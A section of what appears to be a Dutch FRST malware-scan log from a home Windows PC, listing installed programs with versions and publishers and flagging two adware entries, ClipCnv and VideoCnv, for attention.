(Alleen de adware-programma's met 'verborgen' vlag zou kunnen worden toegevoegd aan de fixlist om ze zichtbaar te maken. De adware-programma's moeten handmatig gedeinstallerd worden.)

µTorrent (HKU\S-1-5-21-1460008453-1702061876-2463211388-1000\...\uTorrent) (Version: 3.4.2.37754 - BitTorrent Inc.)
64 Bit HP CIO Components Installer (Version: 6.2.1 - Hewlett-Packard) Hidden
7-Zip 9.20 (x64 edition) (HKLM\...\{23170F69-40C1-2702-0920-000001000000}) (Version: 9.20.00.0 - Igor Pavlov)
Aangifte inkomstenbelasting 2012 (HKLM-x32\...\Aangifte inkomstenbelasting 2012) (Version: - Belastingdienst)
Acrobat.com (HKLM-x32\...\{287ECFA4-719A-2143-A09B-D6A12DE54E40}) (Version: 1.6.65 - Adobe Systems Incorporated)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 2.6.0.19120 - Adobe Systems Incorporated)
Adobe Flash Player 11 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 11.7.700.224 - Adobe Systems Incorporated)
Adobe Flash Player 17 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 17.0.0.134 - Adobe Systems Incorporated)
Adobe Reader X (10.1.10) - Nederlands (HKLM-x32\...\{AC76BA86-7AD7-1043-7B44-AA1000000001}) (Version: 10.1.10 - Adobe Systems Incorporated)
Adobe Shockwave Player (HKLM-x32\...\{D8DFA46A-39F7-4368-810D-18AFCFDDAEAF}) (Version: 11.5.1.601 - Adobe Systems, Inc.)
AIO_CDB_ProductContext (x32 Version: 130.0.365.000 - Hewlett-Packard) Hidden
AIO_CDB_Software (x32 Version: 130.0.365.000 - Hewlett-Packard) Hidden
AIO_Scan (x32 Version: 130.0.421.000 - Hewlett-Packard) Hidden
Apple Application Support (HKLM-x32\...\{83CAF0DE-8D3B-4C37-A631-2B8F16EC3031}) (Version: 3.1 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{BDD99690-3541-4619-9D2A-3CDDB3E15F9E}) (Version: 8.0.5.6 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
Assistent content manager voor PlayStation® (HKLM-x32\...\{BE841724-78F0-44D6-B6C4-C3D53708293B}) (Version: 1.10.4086.63 - Sony Computer Entertainment Inc.)
AVI DVD Burner v5.7.0.195 (HKLM-x32\...\AVI DVD Burner_is1) (Version: - AviDvdBurner.com Inc.)
AviSynth 2.5 (HKLM-x32\...\AviSynth) (Version: - )
Battle.net (HKLM-x32\...\Battle.net) (Version: - Blizzard Entertainment)
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
Broadcom 802.11 Wireless LAN Adapter (HKLM\...\Broadcom 802.11 Wireless LAN Adapter) (Version: 5.60.350.6 - Broadcom Corporation)
BufferChm (x32 Version: 130.0.331.000 - Hewlett-Packard) Hidden
Bullzip PDF Printer 7.2.0.1304 (HKLM\...\Bullzip PDF Printer_is1) (Version: 7.2.0.1304 - Bullzip)
CCleaner (HKLM\...\CCleaner) (Version: 5.03 - Piriform)
ClipCnv (HKLM-x32\...\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{5e9aae86}) (Version: - Software Publisher) <==== AANDACHT
Command & Conquer The First Decade (HKLM-x32\...\{66D6F3BD-CA23-41A4-9FA3-96B26B32528C}) (Version: 1.00.0000 - Electronic Arts)
Company of Heroes (New Steam Version) (HKLM-x32\...\Steam App 228200) (Version: - Relic)
Company of Heroes: Tales of Valor (HKLM-x32\...\Steam App 20540) (Version: - Relic Entertainment)
Copy (x32 Version: 130.0.428.000 - Hewlett-Packard) Hidden
CPUID CPU-Z 1.56 (HKLM\...\CPUID CPU-Z_is1) (Version: - )
Crystal Reports for Visual Studio (x32 Version: 12.51.0.240 - SAP) Hidden
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
DAEMON Tools Lite (HKLM-x32\...\DAEMON Tools Lite) (Version: 4.41.3.0173 - DT Soft Ltd)
Deloitte IndustryPrint Process Modeler 4.2 (HKLM-x32\...\{D26B8EC7-A824-49C3-A1B3-E1E4A4D81DD0}) (Version: 4.2.41 - Deloitte)
Destinations (x32 Version: 140.0.77.000 - Hewlett-Packard) Hidden
DeviceDiscovery (x32 Version: 130.0.465.000 - Hewlett-Packard) Hidden
DocProc (x32 Version: 13.0.0.0 - Hewlett-Packard) Hidden
Dotfuscator Software Services - Community Edition (HKLM-x32\...\{1AA5BD63-6614-44B2-88A7-605191EDB835}) (Version: 5.0.2500.0 - PreEmptive Solutions)
Dropbox (HKLM-x32\...\Dropbox) (Version: 3.12.6 - Dropbox, Inc.)
Dropbox Update Helper (x32 Version: 1.3.27.77 - Dropbox, Inc.) Hidden
ENE CIR Receiver Driver (HKLM\...\FFE7D41DF3C645075BB149E21988B63996C34187) (Version: 2.7.4.0 - ENE)
ESU for Microsoft Windows 7 (HKLM-x32\...\{3877C901-7B90-4727-A639-B6ED2DD59D43}) (Version: 1.0.0 - Hewlett-Packard)
Facebook Video Calling 3.1.0.521 (HKLM-x32\...\{2091F234-EB58-4B80-8C96-8EB78C808CF7}) (Version: 3.1.521 - Skype Limited)
Fax (x32 Version: 130.0.418.000 - Hewlett-Packard) Hidden
ffdshow [rev 2583] [2009-01-05] (HKLM-x32\...\ffdshow_is1) (Version: 1.0 - )
FileHippo.com Update Checker (HKLM-x32\...\FileHippo.com) (Version: - )
GDR 5520 for SQL Server 2008 (KB2977321) (64-bit) (HKLM\...\KB2977321) (Version: 10.3.5520.0 - Microsoft Corporation)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 48.0.2564.97 - Google Inc.)
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.29.1 - Google Inc.) Hidden
GPBaseService2 (x32 Version: 130.0.371.000 - Hewlett-Packard) Hidden
GPL Ghostscript Lite 8.70 (HKLM-x32\...\GPL Ghostscript Lite_is1) (Version: - )
GrabIt 1.7.2 Beta 4 (build 997) (HKLM-x32\...\GrabIt_is1) (Version: - Ilan Shemes)
GTA2 (HKLM-x32\...\{2987EE84-C4EE-4FF5-8160-32DE00D6ABC6}) (Version: 1.00.001 - )
Haali Media Splitter (HKLM-x32\...\HaaliMkx) (Version: - )
HiJackThis (HKLM-x32\...\{45A66726-69BC-466B-A7A4-12FCBA4883D7}) (Version: 1.0.0 - Trend Micro)
HP 3D DriveGuard (HKLM\...\{601871C3-CAFA-4244-B67D-36EC9AFA67EC}) (Version: 4.0.3.1 - Hewlett-Packard)
HP Advisor (HKLM-x32\...\{40FB8D7C-6FF8-4AF2-BC8B-0B1DB32AF04B}) (Version: 3.3.9512.3162 - Hewlett-Packard)
HP Imaging Device Functions 13.0 (HKLM\...\HP Imaging Device Functions) (Version: 13.0 - HP)
HP Integrated Module with Bluetooth wireless technology (HKLM\...\{9E9D49A4-1DF4-4138-B7DB-5D87A893088E}) (Version: 6.2.1.500 - Broadcom Corporation)
HP MediaSmart Webcam (HKLM-x32\...\InstallShield_{01FB4998-33C4-4431-85ED-079E3EEFE75D}) (Version: 3.1.2207 - Hewlett-Packard)
HP Photosmart Essential 3.5 (HKLM\...\HP Photosmart Essential) (Version: 3.5 - HP)
HP Photosmart Officejet and Deskjet All-In-One Driver Software 13.0 Rel. B (HKLM\...\{B61ED343-0B14-4241-999C-490CB1A20DA4}) (Version: 13.0 - HP)
HP Product Detection (HKLM-x32\...\{CAE7D1D9-3794-4169-B4DD-964ADBC534EE}) (Version: 10.7.8.0 - Hewlett-Packard Company)
HP Quick Launch Buttons (HKLM-x32\...\{34D2AB40-150D-475D-AE32-BD23FB5EE355}) (Version: 6.50.7.1 - Hewlett-Packard)
HP Setup (HKLM-x32\...\{17B4760F-334B-475D-829F-1A3E94A6A4E6}) (Version: 1.2.3560.3170 - Hewlett-Packard)
HP Solution Center 13.0 (HKLM\...\HP Solution Center & Imaging Support Tools) (Version: 13.0 - HP)
HP Wireless Assistant (HKLM-x32\...\{54CC7901-804D-4155-B353-21F0CC9112AB}) (Version: 3.50.9.1 - Hewlett-Packard)
HPPhotoGadget (x32 Version: 130.0.282.000 - Hewlett-Packard) Hidden
HPPhotoSmartDiscLabelContent1 (x32 Version: 2.04.0000 - Hewlett-Packard) Hidden
HPPhotosmartEssential (x32 Version: 2.04.0000 - Hewlett-Packard) Hidden
HPProductAssistant (x32 Version: 130.0.371.000 - Hewlett-Packard) Hidden
HTC BMP USB Driver (HKLM-x32\...\{31A559C1-9E4D-423B-9DD3-34A6C5398752}) (Version: 1.0.5375 - HTC)
Huur- en zorgtoeslag 2011 (HKLM-x32\...\Huur- en zorgtoeslag 2011) (Version: - Belastingdienst)
IDT Audio (HKLM-x32\...\{E3A5A8AB-58F6-45FF-AFCB-C9AE18C05001}) (Version: 1.0.6276.0 - IDT)
Intel® Turbo Boost Technology Driver (HKLM-x32\...\{D6C630BF-8DBB-4042-8562-DC9A52CB6E7E}) (Version: 01.00.00.1030 - Intel Corporation)
Intel® Matrix Storage Manager (HKLM\...\{9068B2BE-D93A-4C0A-861C-5E35E2C0E09E}) (Version: - Intel Corporation)
InterBase 7.0 (HKLM-x32\...\InterBase) (Version: - )
IPTInstaller (HKLM-x32\...\{08208143-777D-4A06-BB54-71BF0AD1BB70}) (Version: 4.0.8 - HTC)
iTunes (HKLM\...\{2ABBBD91-91E5-4AD7-929A-FE15D1DC0576}) (Version: 12.0.1.26 - Apple Inc.)
Java 7 Update 60 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F03217060FF}) (Version: 7.0.600 - Oracle)
Java™ SE Development Kit 6 Update 15 (64-bit) (HKLM\...\{64A3A4F4-B792-11D6-A78A-00B0D0160150}) (Version: 1.6.0.150 - Sun Microsystems, Inc.)
JavaFX 2.1.0 (HKLM-x32\...\{1111706F-666A-4037-7777-210328764D10}) (Version: 2.1.0 - Oracle Corporation)
JMicron Flash Media Controller Driver (HKLM-x32\...\{26604C7E-A313-4D12-867F-7C6E7820BE4C}) (Version: 1.0.32.1 - JMicron Technology Corp.)
K-Lite Codec Pack 10.6.5 Basic (HKLM-x32\...\KLiteCodecPack_is1) (Version: 10.6.5 - )
LightScribe System Software (HKLM-x32\...\{CC8E94A2-55C7-4460-953C-2A790180578C}) (Version: 1.18.8.1 - LightScribe)
Microsoft .NET Framework 4 Multi-Targeting Pack (HKLM-x32\...\{CFEF48A8-BFB8-3EAC-8BA5-DE4F8AA267CE}) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4.5.2 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.51209 - Microsoft Corporation)
Microsoft .NET Framework 4.5.2 (Nederlands) (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1043) (Version: 4.5.51209 - Microsoft Corporation)
Microsoft ASP.NET MVC 2 - Visual Studio 2010 Tools (HKLM-x32\...\{40416836-56CC-4C0E-A6AF-5C34BADCE483}) (Version: 2.0.50217.0 - Microsoft Corporation)
Microsoft ASP.NET MVC 2 (HKLM-x32\...\{DD8FF2F3-0D97-4CF3-AF78-FA0E1B242244}) (Version: 2.0.60926.0 - Microsoft Corporation)
Microsoft Games for Windows - LIVE Redistributable (HKLM-x32\...\{F2508213-9989-4E85-A078-72BE483917EF}) (Version: 3.5.88.0 - Microsoft Corporation)
Microsoft Games for Windows Marketplace (HKLM-x32\...\{4CB0307C-565E-4441-86BE-0DF2E4FB828C}) (Version: 3.5.50.0 - Microsoft Corporation)
Microsoft Halo (HKLM-x32\...\Halo) (Version: - Microsoft)
Microsoft Help Viewer 1.1 (HKLM\...\Microsoft Help Viewer 1.1) (Version: 1.1.40219 - Microsoft Corporation)
Microsoft Lync Web App Plug-in (HKLM\...\{D8228565-6CD7-40EF-B2EA-C7C95183EDEB}) (Version: 15.8.8308.577 - Microsoft Corporation)
Microsoft Office Outlook Connector (HKLM-x32\...\{95140000-0081-0413-0000-0000000FF1CE}) (Version: 14.0.6123.5001 - Microsoft Corporation)
Microsoft Office Professional Plus 2010 (HKLM-x32\...\Office14.PROPLUSR) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft Outlook Social Connector Provider for Windows Live Messenger 32-bit (HKLM-x32\...\{95140000-007D-0409-0000-0000000FF1CE}) (Version: 14.0.5120.5000 - Microsoft Corporation)
Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 4.7.205.0 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)
Microsoft Silverlight 3 SDK (HKLM-x32\...\{2012098D-EEE9-4769-8DD3-B038050854D4}) (Version: 3.0.40818.0 - Microsoft Corporation)
Microsoft Silverlight 4 SDK (HKLM-x32\...\{05855322-BE43-41FE-B583-D3AE0C326D58}) (Version: 4.0.50826.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft SQL Server 2008 (64-bit) (HKLM\...\Microsoft SQL Server 10 Release) (Version: - Microsoft Corporation)
Microsoft SQL Server 2008 Browser (HKLM-x32\...\{C688457E-03FD-4941-923B-A27F4D42A7DD}) (Version: 10.3.5500.0 - Microsoft Corporation)
Microsoft SQL Server 2008 Native Client (HKLM\...\{2738C4AA-420E-4E13-ADEF-B5AB250E3EF1}) (Version: 10.3.5500.0 - Microsoft Corporation)
Microsoft SQL Server 2008 R2 Data-Tier Application Framework (HKLM-x32\...\{BC537AE0-88AF-47ED-B762-33B0D62B5188}) (Version: 10.50.1750.9 - Microsoft Corporation)
Microsoft SQL Server 2008 R2 Data-Tier Application Project (HKLM-x32\...\{7A56D81D-6406-40E7-9184-8AC1769C4D69}) (Version: 10.50.1750.9 - Microsoft Corporation)
Microsoft SQL Server 2008 R2 Management Objects (HKLM-x32\...\{77F1F8AD-51B8-4490-AEEC-BF480073E0FC}) (Version: 10.50.1750.9 - Microsoft Corporation)
Microsoft SQL Server 2008 R2 Management Objects (x64) (HKLM\...\{EAEBF166-B06A-4D7F-BAF7-6615303D5C7C}) (Version: 10.50.1750.9 - Microsoft Corporation)
Microsoft SQL Server 2008 R2 Transact-SQL Language Service (HKLM-x32\...\{09C52940-A4D1-4409-A7CC-1AAE630CF578}) (Version: 10.50.1750.9 - Microsoft Corporation)
Microsoft SQL Server 2008 Setup Support Files (HKLM\...\{393CA5BF-0362-42FD-ABC2-BA9D22EF925E}) (Version: 10.3.5520.0 - Microsoft Corporation)
Microsoft SQL Server 2008 Upgrade Advisor (HKLM\...\{0D3BCE9D-1759-41D0-8083-7B1380E7A87E}) (Version: 10.0.1600.22 - Microsoft Corporation)
Microsoft SQL Server Compact 3.5 SP2 ENU (HKLM-x32\...\{3A9FC03D-C685-4831-94CF-4EDFD3749497}) (Version: 3.5.8080.0 - Microsoft Corporation)
Microsoft SQL Server Compact 3.5 SP2 x64 ENU (HKLM\...\{D4AD39AD-091E-4D33-BB2B-59F6FCB8ADC3}) (Version: 3.5.8080.0 - Microsoft Corporation)
Microsoft SQL Server Database Publishing Wizard 1.4 (HKLM-x32\...\{ACE28263-76A4-4BF5-B6F4-8BD719595969}) (Version: 10.1.2512.8 - Microsoft Corporation)
Microsoft SQL Server System CLR Types (HKLM-x32\...\{877B76B2-F83F-4F5A-B28D-3F398641ADB6}) (Version: 10.50.1750.9 - Microsoft Corporation)
Microsoft SQL Server System CLR Types (x64) (HKLM\...\{1E6ED082-E32D-4B2B-8B6A-70B094815135}) (Version: 10.50.1750.9 - Microsoft Corporation)
Microsoft SQL Server VSS Writer (HKLM\...\{0826F9E4-787E-481D-83E0-BC6A57B056D5}) (Version: 10.3.5500.0 - Microsoft Corporation)
Microsoft Sync Framework Runtime v1.0 SP1 (x64) (HKLM\...\{8438EC02-B8A9-462D-AC72-1B521349C001}) (Version: 1.0.3010.0 - Microsoft Corporation)
Microsoft Sync Framework SDK v1.0 SP1 (HKLM-x32\...\{0E3DFC64-CC49-4BE2-8C9C-58EF129675DB}) (Version: 1.0.3010.0 - Microsoft Corporation)
Microsoft Sync Framework Services v1.0 SP1 (x64) (HKLM\...\{034106B5-54B7-467F-B477-5B7DBB492624}) (Version: 1.0.3010.0 - Microsoft Corporation)
Microsoft Sync Services for ADO.NET v2.0 SP1 (x64) (HKLM\...\{1D1CEEF8-3741-45BD-8E77-963E1DEBDDD3}) (Version: 2.0.3010.0 - Microsoft Corporation)
Microsoft Team Foundation Server 2010 Object Model - ENU (HKLM\...\Microsoft Team Foundation Server 2010 Object Model - ENU) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053 (HKLM-x32\...\{770657D0-A123-3C07-8E44-1C83EC895118}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - KB2467174 - x64 9.0.30729.5570 (HKLM\...\{8338783A-0968-3B85-AFC7-BAAE0A63DC50}) (Version: 9.0.30729.5570 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - KB2467174 - x86 9.0.30729.5570 (HKLM-x32\...\{86CE85E6-DBAC-3FFD-B977-E4B79F83C909}) (Version: 9.0.30729.5570 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4974 (HKLM-x32\...\{B7E38540-E355-3503-AFD7-635B2F2F76E1}) (Version: 9.0.30729.4974 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Designtime - 10.0.30319 (HKLM\...\{F5079164-1DB9-3BDA-853B-F78AF67CE071}) (Version: 10.0.30319 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Runtime - 10.0.40219 (HKLM\...\{1C7C8AAF-A16D-32E8-89E5-F6D165DE0BCE}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Runtime - 10.0.40219 (HKLM-x32\...\{5D9ED403-94DE-3BA0-B1D6-71F4BDA412E6}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual F# 2.0 Runtime (HKLM-x32\...\{85467CBC-7A39-33C9-8940-D72D9269B84F}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual J# 2.0 Redistributable Package (HKLM-x32\...\Microsoft Visual J# 2.0 Redistributable Package) (Version: - Microsoft Corporation)
Microsoft Visual Studio 2010 ADO.NET Entity Framework Tools (HKLM-x32\...\{14DD7530-CCD2-3798-B37D-3839ED6A441C}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual Studio 2010 Professional - ENU (HKLM-x32\...\Microsoft Visual Studio 2010 Professional - ENU) (Version: 10.0.30319 - Microsoft Corporation)
Microsoft Visual Studio 2010 Service Pack 1 (HKLM-x32\...\Microsoft Visual Studio 2010 Service Pack 1) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Microsoft Visual Studio Macro Tools (HKLM-x32\...\Microsoft Visual Studio Macro Tools) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Works (HKLM-x32\...\{5158F1F5-FA1B-4D49-B546-55A5004B89BD}) (Version: 9.7.0621 - Microsoft Corporation)
Movie Maker (x32 Version: 16.4.3505.0912 - Microsoft Corporation) Hidden
Mozilla Firefox 34.0.5 (x86 nl) (HKLM-x32\...\Mozilla Firefox 34.0.5 (x86 nl)) (Version: 34.0.5 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 29.0.1 - Mozilla)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
MSXML 4.0 SP2 Parser and SDK (HKLM-x32\...\{716E0306-8318-4364-8B8F-0CC4E9376BAC}) (Version: 4.20.9818.0 - Microsoft Corporation)
MSXML 4.0 SP3 Parser (HKLM-x32\...\{196467F1-C11F-4F76-858B-5812ADC83B94}) (Version: 4.30.2100.0 - Microsoft Corporation)
MSXML 4.0 SP3 Parser (KB2721691) (HKLM-x32\...\{355B5AC0-CEEE-42C5-AD4D-7F3CFD806C36}) (Version: 4.30.2114.0 - Microsoft Corporation)
MSXML 4.0 SP3 Parser (KB2758694) (HKLM-x32\...\{1D95BA90-F4F8-47EC-A882-441C99D30C1E}) (Version: 4.30.2117.0 - Microsoft Corporation)
MSXML 4.0 SP3 Parser (KB973685) (HKLM-x32\...\{859DFA95-E4A6-48CD-B88E-A3E483E89B44}) (Version: 4.30.2107.0 - Microsoft Corporation)
Network64 (Version: 130.0.572.000 - Hewlett-Packard) Hidden
NirSoft BlueScreenView (HKLM-x32\...\NirSoft BlueScreenView) (Version: - )
NVIDIA Grafisch stuurprogramma 341.44 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 341.44 - NVIDIA Corporation)
NVIDIA HD Audio-stuurprogramma 1.3.30.1 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.30.1 - NVIDIA Corporation)
OCR Software by I.R.I.S. 13.0 (HKLM\...\HPOCR) (Version: 13.0 - HP)
Octoshape add-in for Adobe Flash Player (HKU\S-1-5-21-1460008453-1702061876-2463211388-1000\...\Octoshape add-in for Adobe Flash Player) (Version: - )
Origin (HKLM-x32\...\Origin) (Version: 9.1.11.2678 - Electronic Arts, Inc.)
PeerBlock 1.1 (r518) (HKLM\...\{015C5B35-B678-451C-9AEE-821E8D69621C}_is1) (Version: 1.1.0.518 - PeerBlock, LLC)
PM Toolbox (HKLM-x32\...\PM Toolbox) (Version: - )
Project64 1.6 (HKLM-x32\...\{9559F7CA-5E34-4237-A2D9-D856464AD727}) (Version: 1.6 - Project64)
QLBCASL (x32 Version: 6.40.17.2 - Hewlett-Packard) Hidden
QuickTime 7 (HKLM-x32\...\{3D2CBC2C-65D4-4463-87AB-BB2C859C1F3E}) (Version: 7.76.80.95 - Apple Inc.)
Realtek Ethernet Controller Driver For Windows Vista and Later (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 1.00.0010 - Realtek)
Recovery Manager (x32 Version: 5.5.2214 - CyberLink Corp.) Hidden
Recuva (HKLM\...\Recuva) (Version: 1.51 - Piriform)
Relationele Databases en SQL (HKLM-x32\...\Relationele Databases en SQL_is1) (Version: - Mattic Software)
Scan (x32 Version: 140.0.80.000 - Hewlett-Packard) Hidden
Secure Download Manager (HKLM-x32\...\{D8A1AE00-9245-400A-B125-138735C0C5A8}) (Version: 3.1.60 - Kivuto Solutions Inc.)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM-x32\...\{91140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUSR_{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}) (Version: - Microsoft)
Service Pack 3 for SQL Server 2008 (KB2546951) (64-bit) (HKLM\...\KB2546951) (Version: 10.3.5500.0 - Microsoft Corporation)
Skype™ 7.2 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 7.2.103 - Skype Technologies S.A.)
SolutionCenter (x32 Version: 130.0.373.000 - Hewlett-Packard) Hidden
Sothink Movie DVD Maker (HKLM-x32\...\{4F94119D-1B71-400e-9F04-B4E5CEAE71F8}_is1) (Version: 3.7 - SourceTec Software Co., LTD)
Speccy (HKLM\...\Speccy) (Version: 1.07 - Piriform)
SpyHunter 4 (HKLM-x32\...\SpyHunter) (Version: 4.21.18.4608 - Enigma Software Group, LLC)
SpywareBlaster 5.0 (HKLM-x32\...\SpywareBlaster_is1) (Version: 5.0.0 - BrightFort LLC)
Sql Server Customer Experience Improvement Program (Version: 10.3.5500.0 - Microsoft Corporation) Hidden
Status (x32 Version: 130.0.469.000 - Hewlett-Packard) Hidden
Steam (HKLM-x32\...\{048298C9-A4D3-490B-9FF9-AB023A9238F3}) (Version: 1.0.0.0 - Valve Corporation)
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 15.3.29.0 - Synaptics Incorporated)
System Requirements Lab CYRI (HKLM-x32\...\{E5F05232-96B6-4552-A480-785A60A94B21}) (Version: 5.0.6.0 - Husdawg, LLC)
Taalpakket voor Microsoft Visual Studio 2010 Tools for Office Runtime (x64) - NLD (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64) Language Pack - NLD) (Version: 10.0.50903 - Microsoft Corporation)
TeamSpeak 2 RC2 (HKLM-x32\...\Teamspeak 2 RC2_is1) (Version: 2.0.32.60 - Dominating Bytes Design)
TeamViewer 9 (HKLM-x32\...\TeamViewer 9) (Version: 9.0.32494 - TeamViewer)
TechPowerUp GPU-Z (HKLM-x32\...\TechPowerUp GPU-Z) (Version: - )
The Simpsons Hit and Run (HKLM-x32\...\The Simpsons Hit and Run_is1) (Version: - )
TIBCO Universal Uninstaller v2.9 (HKLM-x32\...\tibco_universal_installer_290) (Version: - )
Toolbox (x32 Version: 130.0.648.000 - Hewlett-Packard) Hidden
TrayApp (x32 Version: 130.0.422.000 - Hewlett-Packard) Hidden
TreeSize Free V2.4 (HKLM-x32\...\TreeSize Free_is1) (Version: 2.4 - JAM Software)
Unity Web Player (HKU\S-1-5-21-1460008453-1702061876-2463211388-1000\...\UnityWebPlayer) (Version: - Unity Technologies ApS)
UnloadSupport (x32 Version: 11.0.0 - Hewlett-Packard) Hidden
VideoCnv (HKLM-x32\...\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{fa6789c5}) (Version: - Software Publisher) <==== AANDACHT
Visual Studio 2010 Prerequisites - English (HKLM\...\{662014D2-0450-37ED-ABAE-157C88127BEB}) (Version: 10.0.40219 - Microsoft Corporation)
Visual Studio 2010 Tools for SQL Server Compact 3.5 SP2 ENU (HKLM-x32\...\{112C23F2-C036-4D40-BED4-0CB47BF5555C}) (Version: 4.0.8080.0 - Microsoft Corporation)
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.1.5 - VideoLAN)
WCF RIA Services V1.0 SP1 (HKLM-x32\...\{D9E6001A-5DC3-4620-AF7A-80B6CD48645D}) (Version: 4.1.60114.0 - Microsoft Corporation)
Web Deployment Tool (HKLM\...\{0F37D969-1260-419E-B308-EF7D29ABDE20}) (Version: 1.1.0618 - Microsoft Corporation)
WebReg (x32 Version: 130.0.132.017 - Hewlett-Packard) Hidden
WhoCrashed 3.02 (HKLM\...\WhoCrashed_is1) (Version: - Resplendence Software Projects Sp.)
